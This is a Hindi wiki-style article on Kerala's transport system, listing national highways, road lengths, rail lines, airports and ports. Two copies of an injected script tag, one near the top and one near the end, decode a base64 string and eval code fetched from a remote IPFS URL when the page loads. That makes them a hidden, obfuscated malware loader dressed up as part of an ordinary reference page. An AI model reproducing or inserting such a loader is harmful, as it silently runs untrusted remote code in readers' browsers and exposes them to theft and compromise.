एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "१"।

केरल का यातायात

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
Icon-edit.gif इस लेख का पुनरीक्षण एवं सम्पादन होना आवश्यक है। आप इसमें सहायता कर सकते हैं। "सुझाव"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

नाम लम्‍बाई (कि.मी)
एन.एच. 17 – राष्‍ट्रीय राजमार्ग 420.777
एन.एच. 47 – वालयार कलिमकविला 416.800
एन.एच. 47 A – वैलिंगटन द्वीप से कोच्चि बाईपास 5.920
एन.एच. 49 – बोडीमेट्टू मुवात्‍तपुझा कोच्चि 167.593
एन.एच. 208 – कोल्‍लम आयनिकवू मुवात्‍तपुझा 81.280
एन.एच. 212 – कोझीकोड कल्‍लेगड 117.600
एन.एच. 213 – कोझीकोड कलपलक्‍कड 125.300
एन.एच. 220 –कोल्‍लम कोट्टयम कुमिनी 190.300
  • केरल राज्‍य की यातायात प्रणाली में 1.61 लाख कि.मी. सडकें,
  • 1,148 कि.मी. रेल लाइनें,
  • 1,687 कि.मी. जलमार्ग और *18 हवाई अड्डों के 111 स्‍टेचू मील वायुमार्ग हैं।

केरल में सुविकसित सड़क और रेल प्रणालियाँ हैं। यह राष्ट्रीय राजमार्गों द्वारा तमिलनाडु और कर्नाटक राज्यों से जुड़ा हुआ है। पूर्व की और पालाघाट दर्रें से होकर आने वाला रेलमार्ग राज्य में उत्तर से दक्षिण की ओर भारत के सुदूर दक्षिणी शहर कन्याकुमारी जाने वाले रेलमार्ग से मिलता है। यहाँ के तीन प्रमुख बंदरगाह-कोषिकोड, कोच्चि-एर्णाकुल और आलप्पुषा से तटीय और विदेशी जहाजों का आवागमन होता है। कोच्चि-एर्णाकुलम में एक प्रमुख पोतस्थल और तेलशोधन संयंत्र भी है और यह भारतीय तटरक्षक और नौसेना कमान का मुखयालय भी है। बंदरगाहों से भारी सामान लाने व ले जाने के लिए 1,770 किमी लंबे अंतर्देशीय जलमार्गों का इस्तेमाल होता है। तिरुवनंतपुरम में एक अंतर्राष्ट्रीय हवाई अड्डा और कोषिकोड और कोच्चि में घरेलू उड़ानों के लिए हवाई अड्डे हैं।

सड़कें

केरल देश का पहला राज्‍य है जहां इसके दूरदराज़ के गांवों तक शत प्रतिशत सड़कें मौजूद हैं। राज्‍य सड़कों की कुल लंबाई 138196.471 कि.मी. है, जिसमें से 21467.492 कि.मी. लोक निर्माण विभाग के पास, 1523.954 कि.मी. राष्‍ट्रीय राजमार्ग के पास और 95515.888 कि.मी. पंचायत के अधीन है।

केरल में राष्‍ट्रीय राजमार्ग
  • केरल राज्‍य परिवहन परियोजना ने जून 2002 में विश्‍व बैंक की सहायता से 584 कि. मी. लंबी विद्यमान सड़कों को सुधारने तथा चौडा करने, 993 कि. मी. सड़कों की भारी मरम्‍मत करने तथा 150 कि. मी. के निष्‍पादन से संबंधित रखरखाव के लिए कार्यक्रम आरंभ किया है। इसमें 93 किलोमीटर लंबी अंतर्वर्ती जल नहर की योजना भी शामिल है।

रेलवे

राज्‍य में 1,148 किलोमीटर लंबी रेल लाइनों के अंतर्गत 13 रेलवे मार्ग हैं। बड़ी रेल लाइन 1,053.86 किलोमीटर ओर छोटी लाइन 94;14 किलोमीटर लंबी है।

उड्डयन

राज्‍य में तीन प्रमुख हवाई अड्डे 'तिरूवनंतपुरम', 'कोच्चि' (नेदुंबसेरी) और 'कोझीकोड' में हैं। उनमें से प्रथम दो अंतर्राष्‍ट्रीय हवाई अड्डे हैं।

बंदरगाह

  • 585 कि. मी; लंबी तटवर्ती पंक्ति में केरल में एक बड़ा बंदगाह कोच्चि में है और 17 छोटे मध्‍यवर्ती बंदरगाह है।
  • प्रधानमंत्री ने 16.12.2005 को वल्‍लारपदम अंतर्राष्‍ट्रीय मालवाहक पोत टर्मिनल का शिलान्‍यास किया। इसके पूरा हो जाने पर कोच्चि बंदरगाह हिंद महासागर का एक विशल बंदरगाह बन जाएगा।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख